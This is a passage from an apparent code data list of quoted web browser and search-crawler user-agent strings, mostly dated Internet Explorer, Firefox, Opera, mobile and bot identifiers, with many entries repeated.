.NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; 